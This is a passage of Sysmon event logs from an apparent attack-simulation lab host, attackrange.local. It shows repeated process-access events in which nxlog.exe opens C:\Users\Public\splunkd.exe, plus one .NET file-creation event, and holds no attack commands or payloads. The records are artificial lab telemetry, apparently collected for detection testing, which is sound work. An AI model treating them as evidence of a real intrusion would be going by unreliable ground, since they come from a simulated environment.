(x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8620,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:31.232\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:31.232","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8621,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:32.248\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:32.248","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8622,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:33.263\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:33.263","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8623,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:34.279\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:34.279","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8624,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:35.295\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:35.295","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8625,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:36.310\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:36.310","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8626,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:37.138\r\nProcessGuid: {E2A3D6B1-1384-5F25-0000-001081E10F00}\r\nProcessId: 4124\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\101c-0\\System.Web.dll\r\nCreationUtcTime: 2020-08-01 07:02:37.138","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:37.138","ProcessGuid":"{E2A3D6B1-1384-5F25-0000-001081E10F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\101c-0\\System.Web.dll","CreationUtcTime":"2020-08-01 07:02:37.138","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
